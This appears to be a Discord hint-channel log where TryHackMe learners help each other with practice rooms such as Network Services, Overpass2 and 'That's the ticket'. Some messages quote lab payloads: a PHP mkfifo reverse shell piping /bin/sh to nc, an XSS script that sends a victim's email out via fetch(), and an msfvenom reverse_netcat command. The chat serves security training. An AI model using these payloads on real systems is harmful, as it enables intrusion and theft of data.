#room-hints

1 messages Β· Page 96 of 1

vivid mortar
#

ok

trim haven
#

That will take significantly longer

vivid mortar
#

ok

#

thats my only option though right

left thunder
trim haven
#

Mhm, pretty much

trim haven
left thunder
#

p1-10000 after that go with p10001-20000 if the scans taking that long for you

cursive cairn
#

could also look into some alternatives like zmap which are a bit more optimized for speed I think

vivid mortar
#

What timing changes when you use the -T switch?

cursive cairn
#

but been a few years since I used that, maybe for 1 host it's not that different

trim haven
cursive cairn
#

nice, haven't heard of that one yet.

cursive cairn
#

I just know to be careful with fast scanners, wouldn't be the first time I bring down a router while scanning due to filling the state tables

left thunder
#

-T0 is called Paranoid, that's a good one, didn't know that xD

trim haven
#

Don't use -T5, gives false positives sometimes

vivid mortar
#

nmap -sV machine_IP -vv -p1-1000 -Pn Just ran this and it says

Host is up, received user-set (0.20s latency). All 1000 scanned ports on machine_ip are closed because of 1000 conn-refused

left thunder
hard field
#

Hello! For Network Services Task 7 last part. I started ||netcat on my own machine and try to run msvenom output on the attack machine, but I do not receive the connection on netcat.||

#

Can I send you a message in private? πŸ™‚

plain imp
#

Anyone taken on VulnNet:Active that doesn't mind pointing me in the general direction of the initial foothold?

marble pawn
#

hey, anyone completed CMSpit room ?

sturdy shadow
#

nope at half

marble pawn
#

oh damn

sturdy shadow
#

can't escalate to root and user

marble pawn
#

ugh i need some help with that lol

#

yeah samee

#

im stick on database flag part

#

did you complete that ?

sturdy shadow
#

got database flag?

marble pawn
#

did you ?

#

i didnt

sturdy shadow
#

yes

#

use simple find

marble pawn
#

ohh

sturdy shadow
#

this will search the hell and display u

#

run at /home/user

marble pawn
#

ohh dont we have to connect to the db :3

#

im still www-data tho

sturdy shadow
#

nope

#

cd /home/*

#

if u can simply grep why do u want to connect to database

marble pawn
#

oh thanks man

#

just got it

sturdy shadow
#

and to get shell

#

root shell

sturdy shadow
#

but I'm not able to figure out how to compile it

#

according to my theory it should able to get the root shell

marble pawn
#

ohh thanks dude ill give it a try : D

sturdy shadow
#

yup

marble pawn
#

damn this room is so good ngl

#

learned some new stuff

sturdy shadow
#

hahahahahahaa

marble pawn
#

hehe

sturdy shadow
#

complexity is incorrect its easy

marble pawn
#

hehe eayhh

#

yeahh

marble pawn
#

machne has gcc installed

sturdy shadow
#

Yup

sturdy shadow
#

I can't able get a interactive shell

marble pawn
#

you can stabalize the shell first

#

and then you can use wget to get the exploit ?

sturdy shadow
#

How to do that

marble pawn
#

this contain the way to do it

#

its a script but you can do it manually

zenith monolith
#

Network Services room
task 6, enumerating telnet
"Based on the title returned to us, what do we think this port could be used for?"

vagrant dove
zenith monolith
#

after sending that I figured I should do a service scan

vagrant dove
zenith monolith
#

Not sure, yet, scan is taking a while

vagrant dove
#

hahaha yeh scan may take a while

zenith monolith
#

it didn't recognize the fingerprint

vagrant dove
#

send a ss

zenith monolith
#

hold on I might've used the wrong switch, trying again

#

I can't send screenshots here

vagrant dove
#

copy & paste

zenith monolith
#

ah

#

PORT STATE SERVICE REASON VERSION
8012/tcp open unknown syn-ack ttl 64
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

vagrant dove
#

try run:

#

sudo nmap ipaddress -sS -p 8012 -sV

zenith monolith
#

it done did the same thing as what I was already doin'

#

a stealth scan, then a service scan

vagrant dove
#

could you show me a picture of the message rather than words, snipping tool etc

zenith monolith
#

I got muted for my status, but I'm back

vagrant dove
#

i would leave the -vv out and let the scan run for 5 minutes or so

zenith monolith
#

what's wrong with -vv?

#

Just gives me more output

vagrant dove
#

i normally run a simple scan like this without it and click space every few minutes to check update %

zenith monolith
#

ah, oki

#

this happened the first time I did a service scan, btw

#
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
vagrant dove
#

scans can take a while for some reason…

zenith monolith
#
PORT     STATE SERVICE VERSION
8012/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
#

it happened again

vagrant dove
#

very strange, try restarting the target IP address and running scan again

zenith monolith
#

I'm trying enum again

#

it stopped after session check

#

enum isn't working at all

zenith dust
#

lazyadmin room how long does it take to get the server up? been 20 minsnow. second restart

#

sigh... forgot to run openvpn

viscid hull
#

Hi, wondered if anyone could help me? I'm on task 3 on the SQL Injection Lab Room and logged in with the credentials provided but it doesn't show anywhere I can edit the profile. Am I being an idiot? πŸ˜…

little bronze
#

Hey guys, I just completed day 24 AoC 2020. I am now where I need to fill out a survey form to grab the flag. I completed the survey but it didn't have the flag at the end, it was just a link to fill out the form again :( plz help thanks

last osprey
hard field
last osprey
hard field
green minnowBOT
#

Gave +1 Rep to @last osprey

last osprey
lapis jolt
#

Hi All, I'm stuck on yearoftherabbit. I've gotten Eli's creds.txt but I can't decode the strings in there. Does anyone have a hint or Technic I should be researching? Many thanks

white salmon
lapis jolt
white salmon
#

hmm okay, that is strange

lapis jolt
white salmon
#

could be, but I think morse code uses only - and . characters

lapis jolt
white salmon
#

it's kind of a troll room

lapis jolt
green minnowBOT
#

Gave +1 Rep to @ivory pewter

white salmon
lapis jolt
white salmon
#

oh good, I'm glad

lapis jolt
white salmon
#

no problem at all

quartz pendant
#

Hello guys i am stuck at complete beginner
Network services "ENUMERATING TELNET"
Is it just me or nmap scan take longer then 30mins?

left thunder
#

Adding -T4 to your nmap command might help to speed things up

#

Also adding -vv will let you see progress

quartz pendant
#

Oh thanksπŸ‘ i am scanning all ports thats why

left thunder
quartz pendant
#

Thanks ill try this :)

pseudo socket
twin tree
#

can someone give me a hint Q4 simpleCTF already have root

tough rapids
twin tree
#

yes pls

#

ah already got it /|

tough rapids
lucid fiber
#

How can I copy a file from a remote SMB server to my local linux machine using smbclient?

#

I tried everything but I can't copy one damn file lol

spice shard
#

You can get the file. (:

lucid fiber
#

already done it

#

doesn't work

spice shard
#

What's the command?

lucid fiber
#

get [local name] [remote name]

idle pebble
#

get <file>

lucid fiber
#

what?

idle pebble
#

use that

#

no local remote thing

spice shard
#

get file_name

idle pebble
#

just get <remote file>

lucid fiber
#

Basically, I accessed an SMB server by an Anonymous account so to log into the main server with SSH I have to send the keys from the SMB server to my local linux machine

#

So I don't have to get the file

#

but rather send it

idle pebble
#

oh

#

put <local file>

#

you might have to delete the old one first though

lucid fiber
#

I can't even send a screenshot

lucid fiber
idle pebble
proud scarabBOT
idle pebble
#

wait

#

are you trying to get the ssh keys on the smb server

#

or put your own

lucid fiber
#

That's it

idle pebble
#

then do get id_rsa

lucid fiber
#

on the SMB server?

idle pebble
#

yes

#

and then on your ssh command add -i <path to id_rsa>

#

you might need to chmod 600 it though

lucid fiber
#

I'm so fucking dumb

#

I'm sorry

#

You're right

idle pebble
#

lol no problem

lucid fiber
#

thank you man

#

I appreciate it

#

I tried with this command but didn't work smbclient //server/share -c 'cd c:/remote/path ; put local-file'

#

it says that the file doesn't exist

#

even tho it was right there

idle pebble
#

waitwhat

#

just do smbclient //server/share

#

then cd .ssh

#

and get id_rsa

lucid fiber
#

yeah yeah that's what I've just done

#

But I executed that command before you told me to execute the simple get command

#

what a waste of time lol

idle pebble
#

ah

pure veldt
#

So I'm on the vulnversity room, trying to get the php reverse shell to call back out to me and I don't get a netcat session when I execute the shell. I went into the .phtml file and changed the callback IP to my tun0 from an ifconfig.

Any help is appreciated!

cursive cairn
pure veldt
#

@cursive cairn I believe so, I've got the nc -lvnp 1234 port listening, and I tried running two ways, 1 going through the uploads page and clicking on the file and 2 just going directly to the named link i.e. ||/internal/uploads/shell.phtml/||

pure veldt
#

@cursive cairn could it be something with my vm setup? I don't think I put any restrictions on it when I set it up though.

pearl solar
stuck jewel
#

this is a real pasic help question,

#

basic*

#

the question is this
Find all files in the /usr/bin directory (recursive) that are owned by root and have at least the SUID permission (use symbolic format)

idle pebble
#

ok

#

did you look at the find manpage

stuck jewel
#

i did, i was scanning for SUID at all, i have a vague understanding of that in itself, perhaps i should do another dive into the man

#

the SUID permission is the part im having difficulty finding

idle pebble
#

-perm is the option you want

stuck jewel
#

gotcha, so -perm without any other prefix or specfication looks for "SUID"?

idle pebble
#

no

#

-perm /<permission>

white salmon
stuck jewel
#

doing -perm without anything else satisified the question apparently.

#

thanks for the help everyone

white salmon
#

πŸ‘

bronze narwhal
#

hey

#

the ssh session to linux privesc room seems to be a littile bit unstable

sinful hearth
#

Hi guys, im a bit stuck on Owasp top 10. In the question How many non-root/non-service/non-daemon users are there?

#

My two approaches have been using ps -ef and cat /etc/passwd but the output confuses me. Especially identifying if a user is a service

vagrant dove
#

so the answer is 0

sinful hearth
vagrant dove
rich imp
#

+1 all the users listed in /etc/passwd are either root, service or daemon

frigid coyote
#

Hello guys, i'm having problems with the nmap room practical section

#

with the xmas scan

#

sudo nmap -p-999 -sX -Pn -vv 10.10.191.78
i ran this command because the host doesn't respond to ICMP but i get that all 999 ports are closed

#

"how many ports are shown to be open or filtered?" the answer is clearly a three cypher number

#

did i do something wrong?

loud nebula
#

Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. So i guess you have the answer

frigid coyote
#

Oh...was it that easy i'm so stupid

loud nebula
#

dont beat yourself too hard

#

have fun

#

it just a game

frigid coyote
#

i think the room was created with an older version of nmap that said open|filtered because of no-responses instead of closed because of resets

#

Thanks for the help ❀️

loud nebula
#

I guess. Its 276 days old

#

Cheers, glhf

pure veldt
frigid coyote
#

i have the connection made from outside the vm and it works

feral scroll
# frigid coyote Oh...was it that easy i'm so stupid

I have repeated that phrase "I'm so stupid" at least 100 times going through these rooms. πŸ™‚

We as pentesters/analysts tend to naturally overthink things. I've missed really obvious/easy answers because I overthink A LOT!

You are not stupid my friend! You are here with the rest of us learning and mastering our craft!

Here's to always getting better and moving forward!

glass vine
spice shard
feral scroll
spice shard
#

Indeed πŸ˜„

sand gate
woven mortar
#

do an apt update

#

then apt install python3

sand gate
#

how use in using Sudo a apt update

woven mortar
#

alright

#

yeah do a sudo apt update

sand gate
#

I have already installed install Python 3

woven mortar
#

sudo pip3 install pyqt5

sand gate
#

that's what I've done but its give me that error

woven mortar
#

sudo apt-get install python3-pyqt5

#

try doing this

sand gate
#

Ok

woven mortar
#

tell me if it works

sand gate
#

what are you think the reson fir this error

woven mortar
sand gate
#

no my kali linux is still booting

woven mortar
#

misconfiguration

woven mortar
#

always we need to move this conversation to #room-help this is the hints chanel

last juniper
#

Hi i'm currently in the Network service room/ Task 4 Exploiting SMB. One of the questions is asking me if I can get anonymous access. My command is "smbclient //10.10.155.164/profiles -U Anonymous" but I get the error NT_STATUS_HOST_UNREACHABLE. does anyone know what i'm missing here

grave oracle
#

What rooms need to be completed to get the Pentester Tools badge?

white salmon
#

Anyone know if the network services 2 room is working - it looks like there might be a syntax error in the bash file - think I have the permissions set properly

#

That's the message I get when I try and run the bash file

#

LOL nvm I think I downloaded the webpage not the file

spice shard
grave oracle
green minnowBOT
#

Gave +1 Rep to @spice shard

naive pumice
#

Anyone have completed Avengers room ?

unkempt prism
#

Does anyone know if for the SMTP exploitation section of NS2 there is a further thing to find after the flag?
I've found multiple users for the host, with all pointing towards something, but I don't know if there's a way to leverage it for priv-esc.

small sigil
#

#room-hints Hey guys, I am currently working on the Netowrking services Enumerating telnet, and the last two submit questions I cant figure out. I feel like I am missing a switch or something of the sort.

jolly adder
#

also, check if you have full scanned target machine

#

and the question after this one doesn't require any answers

small sigil
#

Yeah I checked it i saw admin, krbtgt, administrator wonder if the switch im using is wrong. I used nmap -vv -T4 -p 0-65535 10.10.250.196 @jolly adder

#

@jolly adder Im re-running the scan I gave up at about 1 am last night so I am going to check it again this morning see if I missed something.

#

yeah that last question I dont need help with just the two submit questions

small sigil
#

shit thats what I forgot!

jolly adder
small sigil
#

Thank you because that does the username and os detection correct?

jolly adder
jolly adder
small sigil
#

πŸ‘ πŸ’―

#

re-running some of the commands, thank you for your help that is much appreciated!

jolly adder
#

-sS --script-smb-enum-users add this too I found it on the internet

#

I wasn't sure cuz i haven't worked with enumerating users section for a while and I have completed that room long time ago

small sigil
#

Yeah I am just getting started I just did my fisrt enumeration like two days ago. Man if feels so good when you get the flags.

small sigil
#

@jolly adder its a different type of high thats for sure

jolly adder
#

?

small sigil
#

@jolly adder okay this is what I am running nmap -vv -T4 -p 0-65535 -A -sS (thenattheip)

jolly adder
#

okay

#

how much time left till nmap finishes

small sigil
#

36.33% it will be bit

jolly adder
#

it's going fast

#

when I'm running nmap I'm usually waiting over 45 min

#

D:

small sigil
#

Usually takes about 5 minutes im at 41% now

#

Dang 45 minutes thats insane

jolly adder
#

41% will be enough if you dont have battery problems

jolly adder
#

i need to buy a new lapop -_-

small sigil
#

Yeah I got a think pad and I love it

jolly adder
#

lenovo?

small sigil
#

got it about a year ago

#

yep

#

It replaced my surface pro three that I got in like 2013 lol

jolly adder
#

i have legion and it's jut not working normally

small sigil
#

How old is the legion?

jolly adder
small sigil
#

Oh thats new!

#

whats going on with it battery life and that is all?

jolly adder
jolly adder
small sigil
#

RIP bad sectors?

jolly adder
#

im currently saving for ssd

jolly adder
#

a lot of them

small sigil
#

Damn yeah ssd is the way to go for sure

jolly adder
#

yeah

small sigil
#

Yeah bad drive causes so many issues

jolly adder
#

btw you can verify youself for showing your level and eveything in this group

small sigil
#

atleast thats all it is though thats pretty cheap to replace if you do need to get another hdd

jolly adder
small sigil
#

what do you mean verfiy myself?

jolly adder
#

it takes 15 minutes to boot -_-

small sigil
#

JEEZ!

#

I would give up at that point and just go to sleep shows dedication on your end!

small sigil
#

im at 67 %

jolly adder
#

you can have too

small sigil
#

OH I got you

jolly adder
#

i'm used to it now

jolly adder
small sigil
#

So how do I go about assigning myself these roles thought an admin had to do that? Does the bot assign the role im guessing?

spice shard
#

You gotta verify yourself. Follow this link and get verified.

#

!docs verify

proud scarabBOT
small sigil
#

Boom thank you

#

I am a noob lol

tough rapids
jolly adder
#

also

small sigil
#

@tough rapids facts, and I for sure lover learning new things, thats exactly why I joined this discord. So that I could be around like minded people as yourself.

jolly adder
#

level 6 is not that bad

spice shard
small sigil
#

Thanks! @spice shard πŸ™‚

green minnowBOT
#

Gave +1 Rep to @spice shard

small sigil
#

@jolly adder Woot I got the user it was skity I dont know why I didnt see that last nigth it was blasted everywhere lol

jolly adder
#

lol

#

these things happen

small sigil
#

WOOT

#

and i got the other one

jolly adder
#

: D

#

nice

small sigil
#

God I cant believe I was looking at it the whole time!

jolly adder
#

you will get used to it

#

by time you will find answers very quickly

small sigil
#

Yeah I have been knocking them at I have always been getting stuck on the last two everytime

#

Whats funny both times I had the answer I just didnt know where to look for it in the file.

#

or the returned results I mean

#

the -sS was what I needed as well! That was clutch I was missing that switch I knew I was missing something.

jolly adder
#

Those things happens to everyone who is new πŸ™‚

idle vapor
#

Hey guys, I' am having some trouble getting a reverse shell in Telnet using the mkfifo payload - Network Services room, Task 7
I have netcat listening on port 4444 listening locally, but when I run the payload in the telnet session to the target machine, I get no response from netcat.
Can someone please give me a push in the right direction?
I've been at this one for awhile now and hit a bit of a brick wall.

ashen scaffold
#

What room is this for?@idle vapor

#

Try other payloads...

left thunder
tight copper
#

Hey, guys!Could anyone help me with a tip for the super-spam room?

tough rapids
lime condor
#

Hi everyone. Need help on Overpass2-hacked room. I've already completed all of the questions except "what payload did the attacker use to gain access"

#

I think I know the right answer, but I just can't get it right. The first set is 8 characters? yet the payload only starts with <?php

#

the hint says to include the php tags. all the writeups that I have seen has the same answer as I do, but I just can't get it right for some reason. Please help!

quasi zinc
#

Hi guys ...can anyone please help me about "That's the ticket" room. I think I am injecting the correct payload inside the Message textarea but it seems that there is something wrong with room or THM networking because room machine is unable to send request to the HTTP / DNS request catcher..
Payload

 </textarea>
<script>
var email1=document.getElementById('email').innerHTML;
var email2=email1.replace('@','at');
var email3=email2.replace('.','dot');
fetch('http://'+email3+'.b91c9a9edc5062e515d17cac8de12b09.log.tryhackme.tech');
</script>

But I am facing following error from the inspect element (console tab) of browser

2:51 GET http://hamzaxtestycom.38dfc9c03535989591aa46d0e67710d4.log.tryhackme.tech/ net::ERR_NAME_NOT_RESOLVED
(anonymous) @ 2:51
2:1 Uncaught (in promise) TypeError: Failed to fetch
idle vapor
green minnowBOT
#

Gave +1 Rep to @left thunder

idle vapor
marble pawn
#

anyone did Chronicle ?

lilac mountain
#

hey , Ive been doing KoTH Food and I got root and found 6 flags on the system, can anyone give me a nudge or can I pm him my flags so I know what's missing ? ty ^^

clever root
green sedge
#

Hey, I am currently working on the Web Fundamentals room and I am on task 5. I was able to do the GET request no problem but I am having some trouble with the POST request. I have done my own research and tried everything I could think of and can't figure it out. Could someone help point me in the right direction to figure out what is wrong with this? ||curl -X POST -d "flag_please" http://10.10.119.212:8081/ctf/post||

#

oop, nothing was wrong with it, I must have just been mistyping it in the terminal or something

keen maple
covert basalt
#

Let me know if you need any help @keen maple @clever root @marble pawn

gaunt compass
#

I can't get my openvpn configuration file from tryhackme access adress. When o click the download button, its redirect me to 404 error page. Anyone can help?

left thunder
gaunt compass
#

Is waiting a important step? Because i changed server but it doesnt work

gaunt compass
#

Okay, i will try now

#

@left thunder thank u so much bro, i almost went crazy

green minnowBOT
#

Gave +1 Rep to @left thunder

marble pawn
rustic wyvern
#

Hey, one of the questions in the "Network Services" -> Task 3 doesn't seem to be accepting the answer (What ports is SMB running on? ) wondering if it's a bug?

rustic wyvern
green minnowBOT
#

Gave +1 Rep to @dry gate

dry gate
#

there are two ports open to do with smb

rustic wyvern
#

ahh maybe didn't scan over 1k+ ports

dry gate
#

which ports do you get open?

rustic wyvern
#

22/445 and another one but don't have the box open anymore

#

I'll try again later thanks!

dry gate
#

ok :)

#

Feel free to ping me if you want to double-check something ^^

rustic wyvern
green minnowBOT
#

Gave +1 Rep to @dry gate

pure thistle
#

any hints on chronicle yet i can't seem to find the api key?

outer quail
#

Any hints on IntroPoCScripting?

#

I am stuck on task 3, question 5

keen maple
lime condor
#

Hi everyone. Need help on Overpass2-hacked room. I've already completed all of the questions except "what payload did the attacker use to gain access"
I think I know the right answer, but I just can't get it right. The first set is 8 characters? yet the payload only starts with <?php
the hint says to include the php tags. all the writeups that I have seen has the same answer as I do, but I just can't get it right for some reason. Please help!

#

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

#

oh. but it is the IP address from the task file.

#

in any case, i'll try it out. Thanks for the tip!

spare dune
lime condor
#

i tried, but didn't work either.

loud nebula
#

Have you setup listener in port 4242

lime condor
#

in overpass2-hacked, the first part is just analysis of the pcap file. https://tryhackme.com/room/overpass2hacked - I just downloaded the pcap file, analyzed it. found the payload, but i can't seem to get the answer right. - I've also checked the writeups about it. I seem to get the right answer, as it is the same as with the write ups. but when I enter the answer, it is not accepting it. 😦

loud nebula
#

Apologies, I thought you are going to setup revshell

#

Well, I haven't finished the room completely. And is it for question 2? Mine didn't start with <?php

lime condor
#

yes. it's for question 2. does your answer finish with the bracket ) or the greater than sign?

#

I tried to remove the <?php tag. it didn't work either.

left thunder
potent quail
gaunt compass
#

Which room should i join after the simplectf room? I want a easy room

spice shard
#

You can navigate to Learn -> All Rooms and then you can play with the filters. Set the difficulty to easy.

gaunt compass
#

What is the port? And why we scan ports with nmap?

green sedge
#

Ports are essentially where network traffic flows in and out of our machines and we use nmap to figure which of these ports are open and susceptible to attacks. Task 5 in this room talks about ports if you want to learn more https://tryhackme.com/room/packetsframes

Starting down the Pre Security learning path may also be beneficial for learning some of the fundamental networking concepts

pure thistle
pure thistle
potent quail
#

fuzz recursively

pure thistle
#

yes

potent quail
#

well youll find the dir then if you use the right wordlists. i think 2.3 medium finds it. im not sure. ive put lots of lists togehter @pure thistle

hexed fog
#

hello, just started Psycho Break room and the ||map.html|| is a 404 ? is it a bug or on purpose ? Thx

pure thistle
potent quail
#

you need to look at how to pull back the ||git files||

pure thistle
potent quail
#

you found ||.git|| right? it sounds a harsh thing to say, but if you haventy found much then its just researching, and try harder.

#

go look at git on hacktricks

#

maybe search for git tools

#

'gittools' an d 'gitdumper' on github

pure thistle
#

ive found the commit hash but cant do anything with it because i dont have the repo it is in

potent quail
#

ive told you what you need to do above - git tools

#

look at what you can do with git. hacktricks may have something that could help you

pure thistle
#

oh well guess i need to wait for the write ups to come because nothing i do seems to work ugggg

potent quail
lime condor
#

@potent quail how do you write with the black highlights? its so cool!

marble pawn
white salmon
#

Hi guys, I am doing the OWASP juice shop room, but im unsure how the ||nullbyte|| works, it says ||they set it to %2500 to encode for html instead of just %00, why? wouldn't it be %25%00 or 25%00? ||

#

actually would it be better if I just google html encoding

warm niche
#

I need a hint for the hololive room

spice shard
warm niche
#

Ok

potent quail
potent quail
#

did anyone finish chronicle who can help me with the buffer overflow please? im aware its a ret2libc attack due to NX being enabled, but keep getting illegal instruction for binsh and not sure what to do

ripe hedge
#

It's a double encoding

spare glacier
#

hey guys any hints for the chronicle room dont know how to get the api key

jaunty geyser
#

Hello Guys! Pls any hints on "inacave" room (You're in a cave).
I'm stuck when i tried to use my deserialization payload, but its didn't work for me. I used jdk 1.8.0_251

#

@near shoal I know, that u had the same problem. Did you finish it?

near shoal
#

I had to find the right jdk to get it to work. . . don't remember right now which it was 1 sec

#

yeh, can't find it right now

jaunty geyser
#

can I DM

#

&

#

?

near shoal
#

not available atm sorry

jaunty geyser
#

no problem thx

silk wharf
#

Hello everyone, I'm just working through the OSQuery stuff, and I'm up to task 8. "One of the users performed a 'Binary Padding' Attack. What was the target file in the attack? I tried to list the yara_events and file_events but i get error message. I'm stuck I would appreciate if someone can help

quartz pendant
#

Hello i need help i am stuck in OWASP Top 10 from complete beginner path at module 8 Insecure Deserialization - Code Execution

i am not able to get reverse shell i follow same steps as show in instruction

left thunder
quartz pendant
#

i was using attack box
actually i enter wrong if in code thats why i was not geeting reverse shell

thanks @left thunder

green minnowBOT
#

Gave +1 Rep to @left thunder

dry gate
#

Hehe I've just gotten onto Insecure Deserialisation

tiny willow
#

Hey everyone. I'm attempting to work through the Enumerating NFS section of Networking 2. I am able to mount the /home share and am able to cd into the cappucino folder but I am not able to see any files. Based on the material there should be files in this folder. Any ideas on why there are no files? I am using the attack box.

#

Never mind. It appears as though all of the files in the directory are hidden. I just needed to use the -al to see them.

tiny willow
green minnowBOT
#

Gave +1 Rep to @random furnace

dry gate
#

awesome stuff :)

regal comet
#

for those who finished GameBuzz, can I get a nudge on the second part?

hexed crescent
proven bridge
#

I got stuck too

light phoenix
#

Hi! Can someone help me with Walking an Application Room? I'm just missing one question 😦

viscid osprey
#

shit

#

I am using the kali vm provided in thm to download the githib file for use? ^^^^^^^

ripe hedge
pliant citrus
ripe hedge
#

That's a walkthrough no?

#

Should be fine

#

Rule 13 is more for challenge rooms

white salmon
#

What is the name of the role who's job is to identify attacks against an organisation

teal pollen
#

The question is : "What is the flag from the HTML comment?"

supple warren
#

Im assuming im not breaking rule 13 here as it isn't a challenge room. If I am feel free to delete

dry gate
supple warren
green minnowBOT
#

Gave +1 Rep to @supple warren

supple warren
glad ginkgo
#

Hey I need help with the base 2 question goin crazy

silver otter
#

I can count to 2 so hopefully I can help with base2

glad ginkgo
#

Is it a certain way u have put it in decimals

proven bridge
ripe hedge
#

Oof

silver otter
ripe hedge
ripe hedge
proven bridge
ripe hedge
#

Base 8 has 8 possible symbols

proven bridge
#

Base 0 has nothing

ripe hedge
#

Base 0 isn't particularly useful though

proven bridge
#

Base day has 0day

silver otter
#

so you put them together, and you have nothing

proven bridge
#

Truth ^

silver otter
#

well, if you multiply them at least

ripe hedge
#

Maybe a 0day

proven bridge
#

0day = Null

silver otter
#

nothingDay

proven bridge
#

Bully

ripe hedge
#

So you dont exist, thought as much

silver otter
#

I'm sure this person is even more confused now

#

thanks team

#

haha

proven bridge
#

Lol I’m sorry, just woke up.

ripe hedge
#

Yeah that wasn't helpful sorry

proven bridge
#

All bases are belong to us. That’s all they need to know

ripe hedge
#

Base 2 is known by another name

#

There's the hint

#

By convention we use 0 and 1 as the symbols

glad ginkgo
#

Thanks everyone very helpful info

silver otter
#

I didn't even understand the question but hopefully noting that I could count to 2 helped somehow

#

because I can't go much further

ripe hedge
#

Naw I know which question it is

teal pollen
green minnowBOT
#

Gave +1 Rep to @supple warren

sick sun
#

Anyone here done with chronicle room need hint decrypt ||f**fx password||

twin mesa
#

can anyone help me with SQHell

lyric lichen
#

Could someone give me a hint on how to get usernames in chronicle room?

deep cipher
#

Hi all - got a couple of rooms that I'm utterly stuck on:

  1. Poison - I've noted that the search allows local file access, but am utterly stuck on how to move forward with it.
  2. OhSINT - managed it all without too much bother, with the exception of the final question - "What is this persons Dob?". Part of me thinks steghide would be the way to go, but I'll be stuffed if I can work it out!
    Any nudges, pointers or even ridicule would be happily accepted at this point!
severe wave
severe wave
#

gamebuzz?

jaunty geyser
fleet spire
#

I dont get this question

#

what does it even mean

silver otter
#

I guess it wants you to try guess what the process ID would come after 300

#

given similar/same process

#

I don't know what room that is but given the type of question I imagine the answer is probably in text above it

dry gate
fleet spire
#

aand this?

spice shard
#

Which room is this?

fleet spire
#

linux 3

spice shard
#

You have to find the process which is running on the deployed instance. Should you look at hint?

jovial abyss
#

Please What is the code break Ben.Spring bookface account

blissful sapphire
#

Hey guys I am currently doing final exam on the cc pentesting room. I ran nmap||found that two ports are open ssh and http|| then ran nikto found some 4 vulnerabilites||---i am thinking that i should form an XSS attack|| am i in the right path? like what should i do with this info?

loud nebula
#

any other enumeration beside nmap and nikto? like gobuster for example

blissful sapphire
loud nebula
#

umm, rockyou?

blissful sapphire
#

i think its a bit heavy

loud nebula
#

rockyou is worldlist for password brute force, good sir

blissful sapphire
#

yes i understand that but it doesnt run without any wordlist

#

for the dir command

loud nebula
#

there is a perfect wordlist for gobuster in /usr/share/wordlist

blissful sapphire
#

yah just saw that the server is apache ||so i guess it should be apache user enum 1 or 2 ||

#

i will just try that

loud nebula
#

let me/us know if you need more hint, good sir

#

glhf

vivid ingot
#

Hello Everyone, I am working on S3BOTS2 (Splunk 2), Task 5, Question 2. I am using this search query (index="botsv2" host="MACLORY-AIR13" sourcetype=ps *.crypt_) but I cannot seem to located the Game of Thrones episode. I tried adding every known video extension know to man (well...this man, anyway). The answer is supposed to obvious, but evidently, not to me. Any nudge in the right direction is much appreciated, thanks.

fading robin
# jaunty kite +1

i think its not allowed due to rule13, can an admin say if it applies cause that room is a walkthough one not a challenge room

blissful sapphire
loud nebula
#

ok share the gobuster command

blissful sapphire
#

gobuster -dir -u <ip> -w path to the wordlist [||tried with apache-user-enum.1.0 and 2.0 and the directory list 1.0 and 2.3||]

loud nebula
#

try to use || common.txt|| and observe the status code when running the command

#

its either in ||dirb/common.txt|| or ||dirbuster/common.txt||. cant remember

blissful sapphire
#

Thnx for the hint and pardon me for the late reply was just involved?!||I got nyan : some mess am i in the right path?||

loud nebula
#

as in credential?

#

if so then yes

blissful sapphire
#

i made a sin...i just peeked at the next step from a walkthrough....😒. But thnx guys

ashen ravine
potent quail
#

I couldn’t get standard ret2libc to work. I had to use a ROP gadget

ashen ravine
#

@potent quail I surely suck more πŸ™‚ Do you mind sharing the writeup? Didn't manage to find one...

ashen ravine
#

never mind ... managed to find one .... there is something never seen in other basic tutorials

bold karma
#

but im not sure what port is rhost and wich is lhost... i tried both and its still not working after setting up all they asked for

trail crescent
#

hey, I'm doing Relevant room, but got stuck after obtaining two usernames/passwords. I'm not sure where to look at next. Any hint (not a solution πŸ™‚ ) would be highly appreciated!

inner hill
#

I need help with room "ZTH: Obscure Web Vulns" Task 14

This is the task with the JWT tokens where you have to change the token form RS256 to HS256 and recompute the signature from the /public.pem on the server.

I seem to have figured out everything with the encoding and decoding parts, but it doesn't really specify what other changes need to happen for the server. Do I need to change the payload to "data": { "hello": "world" }" like mentioned in the tutorial, or change it to "admin":true or something like on PayloadAllTheThings? I have made sure to maintain the "iat" and "exp" timestamps from the generated JWTs, so that shouldn't be it.

#

Also do I need to hit "Get new JWTs" every time I enter it wrong? ',: /

sacred hinge
#

Need a hint on "Blog". I was able to get a shell as www-data but i cannot find the user.txt flag anywhere and im stuck on priv esc

lucid fiber
#

Is it normal that 3389 is the wrong answer? 'cause I run nmap to scan all the ports and only 3 are open but when I entered 3389 to the question, it says that's not correct

#

this is weird tho

inland cargo
#

Sometimes the services take a bit to start up.

#

Also 3306 is correct because that's the default port for MySQL.

ripe hedge
scarlet hinge
#

I need help with the room "Network Services" I am stuck creating a reverse shell in Task 7 "Exploiting Telnet"

From my attack box I connect to the remote telnet server on port 8012. I started the nc listening port on my attack box with the command "nc -lvp 4444" then on the remote telnet server i type:

.RUN msfvenom -p cmd/unix/reverse_netcat lhost=10.10.182.111 lport=4444 R

But I do not see anything happening. lhost is the IP of my attack box. Does anyone have a hint for me?

open walrus
#

So I'm tryna ping [local THM ip] through telnet while on ovpn. But I get nothing. What do?

sick finch
#

For the Blue room the Payload that i found and is the correct answer for the room is not working and spitting out a bunch of errors anyway to find a payload that does work and open a meterpreter shell?

ripe hedge
ripe hedge
open walrus
ripe hedge
#

You're pinging your VPN IP?

open walrus
#

I'm pinging [local THM ip], which is my IP, since I use ovpn.

stuck fractal
#

Don't include the brackets

#

Do include .RUN

open walrus
#

Tried that. It works very inconsistently. It worked one time, yesterday, on the box. But since then nothing.

ripe hedge
#

It's a bit finicky, especially if you muck up the command

dry gate
#

I'm redoing Network Services: Exploiting SMB. I'm using the attackbox btw. I downloaded the samba RCE exploit mentioned to see if I could actually get it to work (I know it's not what the exercise wants) but I'm running into a few problems that I'm not sure entirely how to get past.

#

thanks in advance c:

ripe hedge
#

Looks like it's missing a module

#

Don't remember requiring a script for that room though

#

